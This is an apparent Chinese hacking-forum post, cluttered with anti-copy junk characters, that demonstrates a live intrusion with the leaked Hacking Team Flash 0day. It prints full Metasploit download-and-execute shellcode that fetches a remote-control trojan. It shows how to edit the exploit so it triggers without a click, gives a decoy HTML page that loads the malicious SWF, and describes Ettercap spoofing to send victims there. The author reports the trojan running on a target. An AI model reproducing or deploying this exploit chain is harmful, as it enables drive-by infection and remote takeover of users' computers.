flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

+ r7 I- ?5 Z8 V' e9 j7 M6 a* L 三、flash 0day之手工代码修改制作下载者实例入侵演示 3 ] }5 b5 F! k) _$ D5 s

, v2 v& g$ q% @ 利用到的工具： / d* _& a3 h: h2 Q2 v7 k% N+ j$ b

+ b8 V( X- q+ E( V Msf 5 J6 b; Q3 r' k0 n; C" w6 t

6 y+ k+ v6 F* u- t9 T1 ^% S0 \ Ettercap 4 a& U T4 v: \0 b

- Q" ?/ @" }5 ~8 \+ v& Z Adobe Flash CS6 , B- ~; a' `2 ]" y% ~

) n5 V' b7 e) X" e9 ^" e# M" e Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 2 \: L6 J/ ^6 u2 d- q6 B

3 B! o7 U) i, _: o% R' y 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options 4 l) a* Y3 S3 d! s$ P( v M3 E! f

* w0 \3 a$ ]2 X. \% h0 t4 j 如图： . W, T2 u$ u5 w+ ?4 y" T

+ Y5 Z4 t0 w9 m) A* x 9 \$ @8 J8 v! i' l c* J

. c( m3 X9 S$ w1 ]4 @ . k! M* m- `! D1 Q$ U' M

2 e% L1 k( U ] 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: . Z2 d& x8 g" i& D4 |& G' x

. B; d8 X0 s" `# j7 } , ?" Z& c, i% `

/ n9 l3 V4 m8 N2 U, I( n' w( K 1 B8 V3 d4 \; w$ ~

0 ~5 C# g' i! i# D0 f8 G* A 然后执行generate -t dword生成shellcode，如下： $ R X4 U8 i& e9 u9 [5 m6 v7 Z

% F, ~3 b6 m8 J+ ~% T: W . P: b* s( z7 C% _

0 c2 |% v+ ?9 b0 `2 M# n; ^ 复制代码到文本下便于我们一会编辑flash exp，如下： " h4 k1 G. |7 m! x1 R7 b9 g2 E# b

( j" s2 A( k) a9 d 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, V! O+ L0 v0 @0 r* D5 }+ x

/ o6 v2 H2 t, Y- R- K1 j4 K5 n 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 7 O! A. v" l3 F% Z* J

" x4 x/ v. p* b 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, / q# h* j$ j3 T+ V" l9 C m3 N

' [0 f) k8 p6 d8 a 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + ~6 ~" V/ o9 z% M1 q% @$ h$ p

! u2 W! L" d: J. |4 M6 _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 j- G9 I3 k6 t7 q

8 z- ]& X, @, ~, A 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 7 z( l' O6 c! Y1 i

% ]* I4 _3 R/ ~% n& m 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ( W$ T( k) G9 @2 s* ^% n

& o- Y+ f1 X- |# r1 o 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 9 P; E/ V! e6 k& U# _

+ k3 r. S( Q) @6 @' e" k' K+ b 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( f: C" u7 q8 q* v) @

. g2 O# ^" Y* o, |2 ^. D 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ( A/ a7 H; F: n) O+ e

0 |( C7 A1 e2 n u7 b" U1 Y/ H 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 1 R2 j% ]6 T l

/ Y! {/ @* b5 H8 i8 P f5 w 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, $ ]0 [ p, a# C' [5 U

( Y% \# i( q- B5 h 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 `6 i: r7 _! ~% g4 T$ X

7 v5 ?! a& |& P- J 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ) s; F( W5 q9 K

9 A* [: S1 Z- p5 y4 Y + t3 H8 E9 R& B7 g

' ^& h: f4 M: o% v6 t9 U 4 v P# g" E/ `

( a; `+ Y" L5 U 下面我们来修改flash 0day exp，需要修改三个文件，分别为： 5 m/ b/ ~3 }" J# `! C* ~, v

0 D. O- t, B# Y; K$ B* C $ s2 [) _7 [) X0 A, S) h

& O8 L0 R* F* z% L) m3 \ 先修改ShellWin32.as，部分源代码如图： 6 \% o3 k& _, F( G

: c5 W+ _. {* Q' |7 p4 J ! u' w# x: C$ a' J6 y4 A2 ^

% `2 [$ ]; I' R1 Q/ j 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： $ h0 Q" D9 Q7 w r4 R

% F/ M8 g+ _# H4 v3 v # {# i9 K4 G) K. x/ f8 s- P% D( F

3 Y' Y/ _( j' T2 D' } 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： : O/ m' S( d6 F; N& e. I" m. O; a! N

- Q( P$ R6 h# _6 C5 D' K . @+ y" @$ W$ Y4 I, R; ?$ `0 a3 c7 `

1 W! U8 K. A& h7 r+ {3 B 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： 1 A: H2 g2 P( I) e+ N

, ~! P: |. d% m, h 5 s( U/ @8 m+ _6 e3 ^' f

2 U8 O5 u4 S W 8 p# Q' K- {1 W. B: ^8 }

4 O! ? m) B$ ?4 { 9 a8 u1 J4 a! w# h* b( {

+ Z6 u( D0 j+ B$ r 然后点保存，下面我们来编译一下，打开 7 j- e& S- s- k: o3 M# L9 _( m

: X: i- m$ e: ] exp1.fla然后点文件-发布，看看编译没错误 1 ^8 _0 d6 i$ f6 w3 I1 P+ _! l d

+ u7 i7 o; @) e5 H ]) P( b$ D" @

( t4 r% N5 M+ T9 f. V 7 h/ B! H# e+ g

' h2 ^: w3 ? L4 O9 c6 i6 [ ?* P% A 1 f8 V7 g' s2 G+ _9 R( D: s, k1 [

7 d e7 f6 O! c9 z7 I) j ) U1 E2 n4 ~8 f* h$ `

+ C# ?, F% ]/ }& _! E8 t 然后我们把生成的 ( p" G3 t# l+ `$ t* @( s

! F; ?4 ]' C, S1 i exp1.swf丢到kailinux 的/var/www/html下： # W5 c4 P; ~' h7 I2 M

6 c, L" D' @0 u* b 然后把这段代码好好编辑一下 4 I1 w: N: G: Z4 o

8 T8 _# y4 G: u1 E' J1 p 6 K: {# V! b. c& B+ f9 @

! g% o4 U$ \9 {! c+ h3 Y% E 9 p- p4 x$ _3 j# {9 i/ |

3 @4 K6 |+ d1 `: ^ u+ H: L X2 w0 }: c

' y* I; z9 ~1 m' ^+ E2 C, \ P ; U2 ~, g8 M& l, @. c6 v! R

- ?) C5 R4 W7 c: _! \ 0 H! B- @0 _2 @( J

: H8 c, D& c P! s7 |! C 9 W1 P4 l E( b* L

* W) u6 w6 K3 y* O4 B1 S' J3 A <!DOCTYPE html> - _" V% b7 c, r) z! F* \+ q

% O& w1 q5 L# C, U <html> 4 d# X, P7 f, f, j8 }0 E8 J5 z

. ]7 G: |: ^& d) I+ C6 e <head> 5 C& d4 x* g+ k. J% f1 y* A

! T: I8 z1 j; C0 @* q <meta http-equiv="Content-Type" content="text/html; $ K' \3 e, v( g" I

5 B. J& P& M7 W" ]/ Z6 Y& d6 Y charset=utf-8"/> 2 o; g5 I O$ C1 c4 H7 W$ _# v) Q. ^

: Q7 v* v$ P) P9 }) X( F </head> / A# |, e( `4 D3 ]

% M. u% Z( d' X! Y1 J <body> + q, v$ D, y+ U- ]6 K8 X

) q* G; \9 V7 W* }. t( o <h2> Please wait, the requested page is loading...</h2> $ ~* G! r" ~" H8 F i

7 Q" G: }% s* {, H. [7 @ <br> 9 a/ M) r) t8 R! ~1 l

; C" f7 c R5 F; i! M <OBJECT & Q3 P! V. q2 t3 W& }

: y# S+ B6 S0 P$ g classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie $ Z4 U9 m: [& z* R9 d! k$ T( A

$ m& G, k- z9 A; p3 A VALUE="http://192.168.0.109/exp1.swf"></OBJECT> - B% e k2 u F+ n

8 l* a: g+ Q& A </body> " T$ D1 e2 a0 V$ k

' [" x! T4 d: {; d( g5 y" S <script> . A3 }) I9 W+ g# p5 I% j4 V

* ^+ [" Y. Z$ K0 d9 V4 J setTimeout(function () { 9 ?( c! n* J h% k0 I

: W4 S' w9 l3 G' [& o$ \ 3 r5 o( S" O; c7 }/ S

0 A5 O" r, V2 P6 `$ \9 V: O window.location.reload(); 7 @7 b0 d, Q' J% [; F

/ Q8 [ R- ]. R$ E5 r0 a }, 10000); 6 i+ n$ R7 A0 W+ M2 R; p5 B

' U8 q# E- T5 t * Q T$ o/ V- {; v" P0 Y( n& k

2 W! M% s0 @1 u6 [ </script> P* d5 @. ?" k* W' ^) h! v o

" S2 o3 I% J' F: S& S$ G4 R3 w </html> 6 t4 Z2 P1 z4 b4 U* e

: E; B# X, R P7 ^# D3 Q 4 k" {# Z; ?& o( B

6 I* \, Z2 o$ `( _, \0 u4 z 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： ! ]2 B7 _$ ^2 z) ?2 m

1 V0 s9 J, a( m7 P- u Z, u D . {8 ]* y# ~& x* C( z

, u2 p3 w0 t; K' C5 E 6 B: P2 g; a" ?: p- m! a

- ~9 B6 \2 Q4 f+ X4 M C $ V. v' I N# M; ~* E8 A* c8 S0 D8 M

1 ]& c1 M, K2 X: o 2 P5 \- l8 C, x) ~- e7 C

$ U A& i# h1 x4 P8 _( [ + I! D! k7 X6 o0 z/ M

$ e( \1 [* w" X9 C6 y& [, u( K0 L 下面我们用ettercap欺骗如图： ! T% y3 r2 |9 L# a) o! M

! N, C r! ^* w: J: Y ( n7 O* ]5 \: \7 S

e- Q5 |" C4 _6 p % c* I% m! w1 ^2 `- Q

0 u( m( Z$ n; U) E1 w1 T 下面我们随便访问个网站看看： 7 S" u( N+ }8 u# ]! r

0 l. h$ p0 G5 s& t5 S8 s 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： / Y' M( Y8 |0 R3 m! i

8 A+ f" |( v( @9 U : w. q# N2 a( X8 O% ?% f7 U" ]0 d2 f) y

; P9 U( @; Z3 j* x 我们看另一台， 4 |8 v1 ~9 e n6 p5 ^

: ]- H' V# {/ G" H# F* H/ s 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 + L' o* @6 h1 u7 T

		自动登录	找回密码
密码			立即注册